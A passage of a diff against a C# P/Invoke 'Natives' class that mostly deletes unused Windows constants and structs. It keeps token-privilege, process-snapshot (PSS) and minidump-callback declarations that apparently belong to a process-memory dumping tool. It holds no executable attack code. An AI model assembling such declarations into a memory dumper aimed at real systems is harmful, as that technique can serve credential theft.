UInt32 TOKEN_ADJUST_GROUPS = 0x0040; public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080; public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100; - public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY); public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID); - public const UInt32 TOKEN_ALT = (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY); public const UInt32 SE_PRIVILEGE_ENABLED = 0x2; @@ -69,59 +51,8 @@ class Natives FILE_WRITE_EA | FILE_APPEND_DATA | SYNCHRONIZE; - - public const long FILE_GENERIC_EXECUTE = STANDARD_RIGHTS_EXECUTE | - FILE_READ_ATTRIBUTES | - FILE_EXECUTE | - SYNCHRONIZE; - - public const int FILE_SHARE_READ = 0x00000001; - public const int FILE_SHARE_WRITE = 0x00000002; - public const int FILE_SHARE_DELETE = 0x00000004; - public const int FILE_ATTRIBUTE_READONLY = 0x00000001; - public const int FILE_ATTRIBUTE_HIDDEN = 0x00000002; - public const int FILE_ATTRIBUTE_SYSTEM = 0x00000004; - public const int FILE_ATTRIBUTE_DIRECTORY = 0x00000010; - public const int FILE_ATTRIBUTE_ARCHIVE = 0x00000020; - public const int FILE_ATTRIBUTE_DEVICE = 0x00000040; + public const int FILE_ATTRIBUTE_NORMAL = 0x00000080; - public const int FILE_ATTRIBUTE_TEMPORARY = 0x00000100; - public const int FILE_ATTRIBUTE_SPARSE_FILE = 0x00000200; - public const int FILE_ATTRIBUTE_REPARSE_POINT = 0x00000400; - public const int FILE_ATTRIBUTE_COMPRESSED = 0x00000800; - public const int FILE_ATTRIBUTE_OFFLINE = 0x00001000; - public const int FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x00002000; - public const int FILE_ATTRIBUTE_ENCRYPTED = 0x00004000; - public const int FILE_NOTIFY_CHANGE_FILE_NAME = 0x00000001; - public const int FILE_NOTIFY_CHANGE_DIR_NAME = 0x00000002; - public const int FILE_NOTIFY_CHANGE_ATTRIBUTES = 0x00000004; - public const int FILE_NOTIFY_CHANGE_SIZE = 0x00000008; - public const int FILE_NOTIFY_CHANGE_LAST_WRITE = 0x00000010; - public const int FILE_NOTIFY_CHANGE_LAST_ACCESS = 0x00000020; - public const int FILE_NOTIFY_CHANGE_CREATION = 0x00000040; - public const int FILE_NOTIFY_CHANGE_SECURITY = 0x00000100; - public const int FILE_ACTION_ADDED = 0x00000001; - public const int FILE_ACTION_REMOVED = 0x00000002; - public const int FILE_ACTION_MODIFIED = 0x00000003; - public const int FILE_ACTION_RENAMED_OLD_NAME = 0x00000004; - public const int FILE_ACTION_RENAMED_NEW_NAME = 0x00000005; - public const int MAILSLOT_NO_MESSAGE = -1; - public const int MAILSLOT_WAIT_FOREVER = -1; - public const int FILE_CASE_SENSITIVE_SEARCH = 0x00000001; - public const int FILE_CASE_PRESERVED_NAMES = 0x00000002; - public const int FILE_UNICODE_ON_DISK = 0x00000004; - public const int FILE_PERSISTENT_ACLS = 0x00000008; - public const int FILE_FILE_COMPRESSION = 0x00000010; - public const int FILE_VOLUME_QUOTAS = 0x00000020; - public const int FILE_SUPPORTS_SPARSE_FILES = 0x00000040; - public const int FILE_SUPPORTS_REPARSE_POINTS = 0x00000080; - public const int FILE_SUPPORTS_REMOTE_STORAGE = 0x00000100; - public const int FILE_VOLUME_IS_COMPRESSED = 0x00008000; - public const int FILE_SUPPORTS_OBJECT_IDS = 0x00010000; - public const int FILE_SUPPORTS_ENCRYPTION = 0x00020000; - public const int FILE_NAMED_STREAMS = 0x00040000; - public const int FILE_READ_ONLY_VOLUME = 0x00080000; - public const int CREATE_ALWAYS = 2; public struct WIN_VER_INFO { @@ -149,9 +80,7 @@ public struct OSVERSIONINFOEXW public byte wProductType; public byte wReserved; } - - - + [StructLayout(LayoutKind.Sequential)] public struct LARGE_INTEGER { @@ -167,45 +96,6 @@ public struct UNICODE_STRING public IntPtr Buffer; } - [StructLayout(LayoutKind.Sequential)] - public struct SYSTEM_PROCESSES - { - public int NextEntryOffset; - public int NumberOfThreads; - public LARGE_INTEGER WorkingSetPrivateSize; - public uint HardFaultCount; - public uint NumberOfThreadsHighWatermark; - public ulong CycleTime; - public long CreateTime; - public long UserTime; - public long KernelTime; - public UNICODE_STRING ImageName; - public int BasePriority; - public IntPtr UniqueProcessId; - public IntPtr InheritedFromUniqueProcessId; - public int HandleCount; - public int SessionId; - public IntPtr UniqueProcessKey; - public IntPtr PeakVirtualSize; - public IntPtr VirtualSize; - public uint PageFaultCount; - public IntPtr PeakWorkingSetSize; - public IntPtr WorkingSetSize; - public IntPtr QuotaPeakPagedPoolUsage; - public IntPtr QuotaPagedPoolUsage; - public IntPtr QuotaPeakNonPagedPoolUsage; - public IntPtr QuotaNonPagedPoolUsage; - public IntPtr PagefileUsage; - public IntPtr PeakPagefileUsage; - public IntPtr PrivatePageCount; - public LARGE_INTEGER ReadOperationCount; - public LARGE_INTEGER WriteOperationCount; - public LARGE_INTEGER OtherOperationCount; - public LARGE_INTEGER ReadTransferCount; - public LARGE_INTEGER WriteTransferCount; - public LARGE_INTEGER OtherTransferCount; - } - [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { @@ -272,498 +162,7 @@ public struct OBJECT_ATTRIBUTES public enum NTSTATUS : uint { // Success - Success = 0x00000000, - Wait0 = 0x00000000, - Wait1 = 0x00000001, - Wait2 = 0x00000002, - Wait3 = 0x00000003, - Wait63 = 0x0000003f, - Abandoned = 0x00000080, - AbandonedWait0 = 0x00000080, - AbandonedWait1 = 0x00000081, - AbandonedWait2 = 0x00000082, - AbandonedWait3 = 0x00000083, - AbandonedWait63 = 0x000000bf, - UserApc = 0x000000c0, - KernelApc = 0x00000100, - Alerted = 0x00000101, - Timeout = 0x00000102, - Pending = 0x00000103, - Reparse = 0x00000104, - MoreEntries = 0x00000105, - NotAllAssigned = 0x00000106, - SomeNotMapped = 0x00000107, - OpLockBreakInProgress = 0x00000108, - VolumeMounted = 0x00000109, - RxActCommitted = 0x0000010a, - NotifyCleanup = 0x0000010b, - NotifyEnumDir = 0x0000010c, - NoQuotasForAccount = 0x0000010d, - PrimaryTransportConnectFailed = 0x0000010e, - PageFaultTransition = 0x00000110, - PageFaultDemandZero = 0x00000111, - PageFaultCopyOnWrite = 0x00000112, - PageFaultGuardPage = 0x00000113, - PageFaultPagingFile = 0x00000114, - CrashDump = 0x00000116, - ReparseObject = 0x00000118, - NothingToTerminate = 0x00000122, - ProcessNotInJob = 0x00000123, - ProcessInJob = 0x00000124, - ProcessCloned = 0x00000129, - FileLockedWithOnlyReaders = 0x0000012a, - FileLockedWithWriters = 0x0000012b, - - // Informational - Informational = 0x40000000, - ObjectNameExists = 0x40000000, - ThreadWasSuspended = 0x40000001, - WorkingSetLimitRange = 0x40000002, - ImageNotAtBase = 0x40000003, - RegistryRecovered = 0x40000009, - - // Warning - Warning = 0x80000000, - GuardPageViolation = 0x80000001, - DatatypeMisalignment = 0x80000002, - Breakpoint = 0x80000003, - SingleStep = 0x80000004, - BufferOverflow = 0x80000005, - NoMoreFiles = 0x80000006, - HandlesClosed = 0x8000000a, - PartialCopy = 0x8000000d, - DeviceBusy = 0x80000011, - InvalidEaName = 0x80000013, - EaListInconsistent = 0x80000014, - NoMoreEntries = 0x8000001a, - LongJump = 0x80000026, - DllMightBeInsecure = 0x8000002b, - - // Error - Error = 0xc0000000, - Unsuccessful = 0xc0000001, - NotImplemented = 0xc0000002, - InvalidInfoClass = 0xc0000003, - InfoLengthMismatch = 0xc0000004, - AccessViolation = 0xc0000005, - InPageError = 0xc0000006, - PagefileQuota = 0xc0000007, - InvalidHandle = 0xc0000008, - BadInitialStack = 0xc0000009, - BadInitialPc = 0xc000000a, - InvalidCid = 0xc000000b, - TimerNotCanceled = 0xc000000c, - InvalidParameter = 0xc000000d, - NoSuchDevice = 0xc000000e, - NoSuchFile = 0xc000000f, - InvalidDeviceRequest = 0xc0000010, - EndOfFile = 0xc0000011, - WrongVolume = 0xc0000012, - NoMediaInDevice = 0xc0000013, - NoMemory = 0xc0000017, - ConflictingAddresses = 0xc0000018, - NotMappedView = 0xc0000019, - UnableToFreeVm = 0xc000001a, - UnableToDeleteSection = 0xc000001b, - IllegalInstruction = 0xc000001d, - AlreadyCommitted = 0xc0000021, - AccessDenied = 0xc0000022, - BufferTooSmall = 0xc0000023, - ObjectTypeMismatch = 0xc0000024, - NonContinuableException = 0xc0000025, - BadStack = 0xc0000028, - NotLocked = 0xc000002a, - NotCommitted = 0xc000002d, - InvalidParameterMix = 0xc0000030, - ObjectNameInvalid = 0xc0000033, - ObjectNameNotFound = 0xc0000034, - ObjectNameCollision = 0xc0000035, - ObjectPathInvalid = 0xc0000039, - ObjectPathNotFound = 0xc000003a, - ObjectPathSyntaxBad = 0xc000003b, - DataOverrun = 0xc000003c, - DataLate = 0xc000003d, - DataError = 0xc000003e, - CrcError = 0xc000003f, - SectionTooBig = 0xc0000040, - PortConnectionRefused = 0xc0000041, - InvalidPortHandle = 0xc0000042, - SharingViolation = 0xc0000043, - QuotaExceeded = 0xc0000044, - InvalidPageProtection = 0xc0000045, - MutantNotOwned = 0xc0000046, - SemaphoreLimitExceeded = 0xc0000047, - PortAlreadySet = 0xc0000048, - SectionNotImage = 0xc0000049, - SuspendCountExceeded = 0xc000004a, - ThreadIsTerminating = 0xc000004b, - BadWorkingSetLimit = 0xc000004c, - IncompatibleFileMap = 0xc000004d, - SectionProtection = 0xc000004e, - EasNotSupported = 0xc000004f, - EaTooLarge = 0xc0000050, - NonExistentEaEntry = 0xc0000051, - NoEasOnFile = 0xc0000052, - EaCorruptError = 0xc0000053, - FileLockConflict = 0xc0000054, - LockNotGranted = 0xc0000055, - DeletePending = 0xc0000056, - CtlFileNotSupported = 0xc0000057, - UnknownRevision = 0xc0000058, - RevisionMismatch = 0xc0000059, - InvalidOwner = 0xc000005a, - InvalidPrimaryGroup = 0xc000005b, - NoImpersonationToken = 0xc000005c, - CantDisableMandatory = 0xc000005d, - NoLogonServers = 0xc000005e, - NoSuchLogonSession = 0xc000005f, - NoSuchPrivilege = 0xc0000060, - PrivilegeNotHeld = 0xc0000061, - InvalidAccountName = 0xc0000062, - UserExists = 0xc0000063, - NoSuchUser = 0xc0000064, - GroupExists = 0xc0000065, - NoSuchGroup = 0xc0000066, - MemberInGroup = 0xc0000067, - MemberNotInGroup = 0xc0000068, - LastAdmin = 0xc0000069, - WrongPassword = 0xc000006a, - IllFormedPassword = 0xc000006b, - PasswordRestriction = 0xc000006c, - LogonFailure = 0xc000006d, - AccountRestriction = 0xc000006e, - InvalidLogonHours = 0xc000006f, - InvalidWorkstation = 0xc0000070, - PasswordExpired = 0xc0000071, - AccountDisabled = 0xc0000072, - NoneMapped = 0xc0000073, - TooManyLuidsRequested = 0xc0000074, - LuidsExhausted = 0xc0000075, - InvalidSubAuthority = 0xc0000076, - InvalidAcl = 0xc0000077, - InvalidSid = 0xc0000078, - InvalidSecurityDescr = 0xc0000079, - ProcedureNotFound = 0xc000007a, - InvalidImageFormat = 0xc000007b, - NoToken = 0xc000007c, - BadInheritanceAcl = 0xc000007d, - RangeNotLocked = 0xc000007e, - DiskFull = 0xc000007f, - ServerDisabled = 0xc0000080, - ServerNotDisabled = 0xc0000081, - TooManyGuidsRequested = 0xc0000082, - GuidsExhausted = 0xc0000083, - InvalidIdAuthority = 0xc0000084, - AgentsExhausted = 0xc0000085, - InvalidVolumeLabel = 0xc0000086, - SectionNotExtended = 0xc0000087, - NotMappedData = 0xc0000088, - ResourceDataNotFound = 0xc0000089, - ResourceTypeNotFound = 0xc000008a, - ResourceNameNotFound = 0xc000008b, - ArrayBoundsExceeded = 0xc000008c, - FloatDenormalOperand = 0xc000008d, - FloatDivideByZero = 0xc000008e, - FloatInexactResult = 0xc000008f, - FloatInvalidOperation = 0xc0000090, - FloatOverflow = 0xc0000091, - FloatStackCheck = 0xc0000092, - FloatUnderflow = 0xc0000093, - IntegerDivideByZero = 0xc0000094, - IntegerOverflow = 0xc0000095, - PrivilegedInstruction = 0xc0000096, - TooManyPagingFiles = 0xc0000097, - FileInvalid = 0xc0000098, - InstanceNotAvailable = 0xc00000ab, - PipeNotAvailable = 0xc00000ac, - InvalidPipeState = 0xc00000ad, - PipeBusy = 0xc00000ae, - IllegalFunction = 0xc00000af, - PipeDisconnected = 0xc00000b0, - PipeClosing = 0xc00000b1, - PipeConnected = 0xc00000b2, - PipeListening = 0xc00000b3, - InvalidReadMode = 0xc00000b4, - IoTimeout = 0xc00000b5, - FileForcedClosed = 0xc00000b6, - ProfilingNotStarted = 0xc00000b7, - ProfilingNotStopped = 0xc00000b8, - NotSameDevice = 0xc00000d4, - FileRenamed = 0xc00000d5, - CantWait = 0xc00000d8, - PipeEmpty = 0xc00000d9, - CantTerminateSelf = 0xc00000db, - InternalError = 0xc00000e5, - InvalidParameter1 = 0xc00000ef, - InvalidParameter2 = 0xc00000f0, - InvalidParameter3 = 0xc00000f1, - InvalidParameter4 = 0xc00000f2, - InvalidParameter5 = 0xc00000f3, - InvalidParameter6 = 0xc00000f4, - InvalidParameter7 = 0xc00000f5, - InvalidParameter8 = 0xc00000f6, - InvalidParameter9 = 0xc00000f7, - InvalidParameter10 = 0xc00000f8, - InvalidParameter11 = 0xc00000f9, - InvalidParameter12 = 0xc00000fa, - MappedFileSizeZero = 0xc000011e, - TooManyOpenedFiles = 0xc000011f, - Cancelled = 0xc0000120, - CannotDelete = 0xc0000121, - InvalidComputerName = 0xc0000122, - FileDeleted = 0xc0000123, - SpecialAccount = 0xc0000124, - SpecialGroup = 0xc0000125, - SpecialUser = 0xc0000126, - MembersPrimaryGroup = 0xc0000127, - FileClosed = 0xc0000128, - TooManyThreads = 0xc0000129, - ThreadNotInProcess = 0xc000012a, - TokenAlreadyInUse = 0xc000012b, - PagefileQuotaExceeded = 0xc000012c, - CommitmentLimit = 0xc000012d, - InvalidImageLeFormat = 0xc000012e, - InvalidImageNotMz = 0xc000012f, - InvalidImageProtect = 0xc0000130, - InvalidImageWin16 = 0xc0000131, - LogonServer = 0xc0000132, - DifferenceAtDc = 0xc0000133, - SynchronizationRequired = 0xc0000134, - DllNotFound = 0xc0000135, - IoPrivilegeFailed = 0xc0000137, - OrdinalNotFound = 0xc0000138, - EntryPointNotFound = 0xc0000139, - ControlCExit = 0xc000013a, - PortNotSet = 0xc0000353, - DebuggerInactive = 0xc0000354, - CallbackBypass = 0xc0000503, - PortClosed = 0xc0000700, - MessageLost = 0xc0000701, - InvalidMessage = 0xc0000702, - RequestCanceled = 0xc0000703, - RecursiveDispatch = 0xc0000704, - LpcReceiveBufferExpected = 0xc0000705, - LpcInvalidConnectionUsage = 0xc0000706, - LpcRequestsNotAllowed = 0xc0000707, - ResourceInUse = 0xc0000708, - ProcessIsProtected = 0xc0000712, - VolumeDirty = 0xc0000806, - FileCheckedOut = 0xc0000901, - CheckOutRequired = 0xc0000902, - BadFileType = 0xc0000903, - FileTooLarge = 0xc0000904, - FormsAuthRequired = 0xc0000905, - VirusInfected = 0xc0000906, - VirusDeleted = 0xc0000907, - TransactionalConflict = 0xc0190001, - InvalidTransaction = 0xc0190002, - TransactionNotActive = 0xc0190003, - TmInitializationFailed = 0xc0190004, - RmNotActive = 0xc0190005, - RmMetadataCorrupt = 0xc0190006, - TransactionNotJoined = 0xc0190007, - DirectoryNotRm = 0xc0190008, - CouldNotResizeLog = 0xc0190009, - TransactionsUnsupportedRemote = 0xc019000a, - LogResizeInvalidSize = 0xc019000b, - RemoteFileVersionMismatch = 0xc019000c, - CrmProtocolAlreadyExists = 0xc019000f, - TransactionPropagationFailed = 0xc0190010, - CrmProtocolNotFound = 0xc0190011, - TransactionSuperiorExists = 0xc0190012, - TransactionRequestNotValid = 0xc0190013, - TransactionNotRequested = 0xc0190014, - TransactionAlreadyAborted = 0xc0190015, - TransactionAlreadyCommitted = 0xc0190016, - TransactionInvalidMarshallBuffer = 0xc0190017, - CurrentTransactionNotValid = 0xc0190018, - LogGrowthFailed = 0xc0190019, - ObjectNoLongerExists = 0xc0190021, - StreamMiniversionNotFound = 0xc0190022, - StreamMiniversionNotValid = 0xc0190023, - MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024, - CantOpenMiniversionWithModifyIntent = 0xc0190025, - CantCreateMoreStreamMiniversions = 0xc0190026, - HandleNoLongerValid = 0xc0190028, - NoTxfMetadata = 0xc0190029, - LogCorruptionDetected = 0xc0190030, - CantRecoverWithHandleOpen = 0xc0190031, - RmDisconnected = 0xc0190032, - EnlistmentNotSuperior = 0xc0190033, - RecoveryNotNeeded = 0xc0190034, - RmAlreadyStarted = 0xc0190035, - FileIdentityNotPersistent = 0xc0190036, - CantBreakTransactionalDependency = 0xc0190037, - CantCrossRmBoundary = 0xc0190038, - TxfDirNotEmpty = 0xc0190039, - IndoubtTransactionsExist = 0xc019003a, - TmVolatile = 0xc019003b, - RollbackTimerExpired = 0xc019003c, - TxfAttributeCorrupt = 0xc019003d, - EfsNotAllowedInTransaction = 0xc019003e, - TransactionalOpenNotAllowed = 0xc019003f, - TransactedMappingUnsupportedRemote = 0xc0190040, - TxfMetadataAlreadyPresent = 0xc0190041, - TransactionScopeCallbacksNotSet = 0xc0190042, - TransactionRequiredPromotion = 0xc0190043, - CannotExecuteFileInTransaction = 0xc0190044, - TransactionsNotFrozen = 0xc0190045, - - MaximumNtStatus = 0xffffffff - } - - public enum SYSTEM_INFORMATION_CLASS - { - SystemBasicInformation = 0x0000, - SystemProcessorInformation = 0x0001, - SystemPerformanceInformation = 0x0002, - SystemTimeOfDayInformation = 0x0003, - SystemPathInformation = 0x0004, - SystemProcessInformation = 0x0005, - SystemCallCountInformation = 0x0006, - SystemDeviceInformation = 0x0007, - SystemProcessorPerformanceInformation = 0x0008, - SystemFlagsInformation = 0x0009, - SystemCallTimeInformation = 0x000A, - SystemModuleInformation = 0x000B, - SystemLocksInformation = 0x000C, - SystemStackTraceInformation = 0x000D, - SystemPagedPoolInformation = 0x000E, - SystemNonPagedPoolInformation = 0x000F, - SystemHandleInformation = 0x0010, - SystemObjectInformation = 0x0011, - SystemPageFileInformation = 0x0012, - SystemVdmInstemulInformation = 0x0013, - SystemVdmBopInformation = 0x0014, - SystemFileCacheInformation = 0x0015, - SystemPoolTagInformation = 0x0016, - SystemInterruptInformation = 0x0017, - SystemDpcBehaviorInformation = 0x0018, - SystemFullMemoryInformation = 0x0019, - SystemLoadGdiDriverInformation = 0x001A, - SystemUnloadGdiDriverInformation = 0x001B, - SystemTimeAdjustmentInformation = 0x001C, - SystemSummaryMemoryInformation = 0x001D, - SystemMirrorMemoryInformation = 0x001E, - SystemPerformanceTraceInformation = 0x001F, - SystemCrashDumpInformation = 0x0020, - SystemExceptionInformation = 0x0021, - SystemCrashDumpStateInformation = 0x0022, - SystemKernelDebuggerInformation = 0x0023, - SystemContextSwitchInformation = 0x0024, - SystemRegistryQuotaInformation = 0x0025, - SystemExtendServiceTableInformation = 0x0026, - SystemPrioritySeperation = 0x0027, - SystemVerifierAddDriverInformation = 0x0028, - SystemVerifierRemoveDriverInformation = 0x0029, - SystemProcessorIdleInformation = 0x002A, - SystemLegacyDriverInformation = 0x002B, - SystemCurrentTimeZoneInformation = 0x002C, - SystemLookasideInformation = 0x002D, - SystemTimeSlipNotification = 0x002E, - SystemSessionCreate = 0x002F, - SystemSessionDetach = 0x0030, - SystemSessionInformation = 0x0031, - SystemRangeStartInformation = 0x0032, - SystemVerifierInformation = 0x0033, - SystemVerifierThunkExtend = 0x0034, - SystemSessionProcessInformation = 0x0035, - SystemLoadGdiDriverInSystemSpace = 0x0036, - SystemNumaProcessorMap = 0x0037, - SystemPrefetcherInformation = 0x0038, - SystemExtendedProcessInformation = 0x0039, - SystemRecommendedSharedDataAlignment = 0x003A, - SystemComPlusPackage = 0x003B, - SystemNumaAvailableMemory = 0x003C, - SystemProcessorPowerInformation = 0x003D, - SystemEmulationBasicInformation = 0x003E, - SystemEmulationProcessorInformation = 0x003F, - SystemExtendedHandleInformation = 0x0040, - SystemLostDelayedWriteInformation = 0x0041, - SystemBigPoolInformation = 0x0042, - SystemSessionPoolTagInformation = 0x0043, - SystemSessionMappedViewInformation = 0x0044, - SystemHotpatchInformation = 0x0045, - SystemObjectSecurityMode = 0x0046, - SystemWatchdogTimerHandler = 0x0047, - SystemWatchdogTimerInformation = 0x0048, - SystemLogicalProcessorInformation = 0x0049, - SystemWow64SharedInformationObsolete = 0x004A, - SystemRegisterFirmwareTableInformationHandler = 0x004B, - SystemFirmwareTableInformation = 0x004C, - SystemModuleInformationEx = 0x004D, - SystemVerifierTriageInformation = 0x004E, - SystemSuperfetchInformation = 0x004F, - SystemMemoryListInformation = 0x0050, - SystemFileCacheInformationEx = 0x0051, - SystemThreadPriorityClientIdInformation = 0x0052, - SystemProcessorIdleCycleTimeInformation = 0x0053, - SystemVerifierCancellationInformation = 0x0054, - SystemProcessorPowerInformationEx = 0x0055, - SystemRefTraceInformation = 0x0056, - SystemSpecialPoolInformation = 0x0057, - SystemProcessIdInformation = 0x0058, - SystemErrorPortInformation = 0x0059, - SystemBootEnvironmentInformation = 0x005A, - SystemHypervisorInformation = 0x005B, - SystemVerifierInformationEx = 0x005C, - SystemTimeZoneInformation = 0x005D, - SystemImageFileExecutionOptionsInformation = 0x005E, - SystemCoverageInformation = 0x005F, - SystemPrefetchPatchInformation = 0x0060, - SystemVerifierFaultsInformation = 0x0061, - SystemSystemPartitionInformation = 0x0062, - SystemSystemDiskInformation = 0x0063, - SystemProcessorPerformanceDistribution = 0x0064, - SystemNumaProximityNodeInformation = 0x0065, - SystemDynamicTimeZoneInformation = 0x0066, - SystemCodeIntegrityInformation = 0x0067, - SystemProcessorMicrocodeUpdateInformation = 0x0068, - SystemProcessorBrandString = 0x0069, - SystemVirtualAddressInformation = 0x006A, - SystemLogicalProcessorAndGroupInformation = 0x006B, - SystemProcessorCycleTimeInformation = 0x006C, - SystemStoreInformation = 0x006D, - SystemRegistryAppendString = 0x006E, - SystemAitSamplingValue = 0x006F, - SystemVhdBootInformation = 0x0070, - SystemCpuQuotaInformation = 0x0071, - SystemNativeBasicInformation = 0x0072, - SystemErrorPortTimeouts = 0x0073, - SystemLowPriorityIoInformation = 0x0074, - SystemBootEntropyInformation = 0x0075, - SystemVerifierCountersInformation = 0x0076, - SystemPagedPoolInformationEx = 0x0077, - SystemSystemPtesInformationEx = 0x0078, - SystemNodeDistanceInformation = 0x0079, - SystemAcpiAuditInformation = 0x007A, - SystemBasicPerformanceInformation = 0x007B, - SystemQueryPerformanceCounterInformation = 0x007C, - SystemSessionBigPoolInformation = 0x007D, - SystemBootGraphicsInformation = 0x007E, - SystemScrubPhysicalMemoryInformation = 0x007F, - SystemBadPageInformation = 0x0080, - SystemProcessorProfileControlArea = 0x0081, - SystemCombinePhysicalMemoryInformation = 0x0082, - SystemEntropyInterruptTimingInformation = 0x0083, - SystemConsoleInformation = 0x0084, - SystemPlatformBinaryInformation = 0x0085, - SystemThrottleNotificationInformation = 0x0086, - SystemHypervisorProcessorCountInformation = 0x0087, - SystemDeviceDataInformation = 0x0088, - SystemDeviceDataEnumerationInformation = 0x0089, - SystemMemoryTopologyInformation = 0x008A, - SystemMemoryChannelInformation = 0x008B, - SystemBootLogoInformation = 0x008C, - SystemProcessorPerformanceInformationEx = 0x008D, - SystemSpare0 = 0x008E, - SystemSecureBootPolicyInformation = 0x008F, - SystemPageFileInformationEx = 0x0090, - SystemSecureBootInformation = 0x0091, - SystemEntropyInterruptTimingRawInformation = 0x0092, - SystemPortableWorkspaceEfiLauncherInformation = 0x0093, - SystemFullProcessInformation = 0x0094, - MaxSystemInfoClass = 0x0095 + Success = 0x00000000 } public struct TOKEN_ELEVATION { @@ -814,13 +213,6 @@ public enum TOKEN_INFORMATION_CLASS TokenIsRestricted, MaxTokenInfoClass } - - public enum TOKEN_ELEVATION_TYPE - { - TokenElevationTypeDefault = 1, - TokenElevationTypeFull, - TokenElevationTypeLimited - } public enum PSS_CAPTURE_FLAGS { PSS_CAPTURE_NONE, @@ -889,64 +281,7 @@ public struct MINIDUMP_THREAD_EX_CALLBACK public ulong BackingStoreBase; public ulong BackingStoreEnd; } - - enum VS_FIXEDFILEINFO_FileFlags : uint - { - VS_FF_DEBUG = 0x00000001, - VS_FF_INFOINFERRED = 0x00000010, - VS_FF_PATCHED = 0x00000004, - VS_FF_PRERELEASE = 0x00000002, - VS_FF_PRIVATEBUILD = 0x00000008, - VS_FF_SPECIALBUILD = 0x00000020 - } - - enum VS_FIXEDFILEINFO_FileOSFlags : uint - { - VOS_DOS = 0x00010000, - VOS_NT = 0x00040000, - VOS__WINDOWS16 = 0x00000001, - VOS__WINDOWS32 = 0x00000004, - VOS_OS216 = 0x00020000, - VOS_OS232 = 0x00030000, - VOS__PM16 = 0x00000002, - VOS__PM32 = 0x00000003, - VOS_UNKNOWN = 0x00000000 - } - - enum VS_FIXEDFILEINFO_FileTypeFlags : uint - { - VFT_APP = 0x00000001, - VFT_DLL = 0x00000002, - VFT_DRV = 0x00000003, - VFT_FONT = 0x00000004, - VFT_STATIC_LIB = 0x00000007, - VFT_UNKNOWN = 0x00000000, - VFT_VXD = 0x00000005 - } - - enum VS_FIXEFILEINFO_FileSubTypeFlags : uint - { - // If the FileType is VFT_DRV - VFT2_DRV_COMM = 0x0000000A, - VFT2_DRV_DISPLAY = 0x00000004, - VFT2_DRV_INSTALLABLE = 0x00000008, - VFT2_DRV_KEYBOARD = 0x00000002, - VFT2_DRV_LANGUAGE = 0x00000003, - VFT2_DRV_MOUSE = 0x00000005, - VFT2_DRV_NETWORK = 0x00000006, - VFT2_DRV_PRINTER = 0x00000001, - VFT2_DRV_SOUND = 0x00000009, - VFT2_DRV_SYSTEM = 0x00000007, - VFT2_DRV_VERSIONED_PRINTER = 0x0000000C, - - // If the FileType is VFT_FONT - VFT2_FONT_RASTER = 0x00000001, - VFT2_FONT_TRUETYPE = 0x00000003, - VFT2_FONT_VECTOR = 0x00000002, - - VFT2_UNKNOWN = 0x00000000 - } - + [StructLayout(LayoutKind.Sequential, Pack = 4)] public struct VS_FIXEDFILEINFO { @@ -1178,151 +513,14 @@ public struct MINIDUMP_CALLBACK_INFORMATION public MINIDUMP_CALLBACK_ROUTINE CallbackRoutine; public IntPtr CallbackParam; } - - public enum CONTEXT_FLAGS : uint - { - CONTEXT_i386 = 0x10000, - CONTEXT_i486 = 0x10000, // same as i386 - CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP - CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI - CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS - CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state - CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7 - CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions - CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS, - CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS - } - - [StructLayout(LayoutKind.Sequential)] - public struct M128A - { - public ulong High; - public long Low; - - public override string ToString() - { - return string.Format("High:{0}, Low:{1}", this.High, this.Low); - } - } - - /// - /// x64 - /// - [StructLayout(LayoutKind.Sequential, Pack = 16)] - public struct XSAVE_FORMAT64 - { - public ushort ControlWord; - public ushort StatusWord; - public byte TagWord; - public byte Reserved1; - public ushort ErrorOpcode; - public uint ErrorOffset; - public ushort ErrorSelector; - public ushort Reserved2; - public uint DataOffset; - public ushort DataSelector; - public ushort Reserved3; - public uint MxCsr; - public uint MxCsr_Mask; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)] - public M128A[] FloatRegisters; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] - public M128A[] XmmRegisters; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)] - public byte[] Reserved4; - } - - - - /// - /// x64 - /// - [StructLayout(LayoutKind.Sequential, Pack = 16)] - public struct CONTEXT - { - public ulong P1Home; - public ulong P2Home; - public ulong P3Home; - public ulong P4Home; - public ulong P5Home; - public ulong P6Home; - - public CONTEXT_FLAGS ContextFlags; - public uint MxCsr; - - public ushort SegCs; - public ushort SegDs; - public ushort SegEs; - public ushort SegFs; - public ushort SegGs; - public ushort SegSs; - public uint EFlags; - - public ulong Dr0; - public ulong Dr1; - public ulong Dr2; - public ulong Dr3; - public ulong Dr6; - public ulong Dr7; - - public ulong Rax; - public ulong Rcx; - public ulong Rdx; - public ulong Rbx; - public ulong Rsp; - public ulong Rbp; - public ulong Rsi; - public ulong Rdi; - public ulong R8; - public ulong R9; - public ulong R10; - public ulong R11; - public ulong R12; - public ulong R13; - public ulong R14; - public ulong R15; - public ulong Rip; - - public XSAVE_FORMAT64 DUMMYUNIONNAME; - - [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)] - public M128A[] VectorRegister; - public ulong VectorControl; - - public ulong 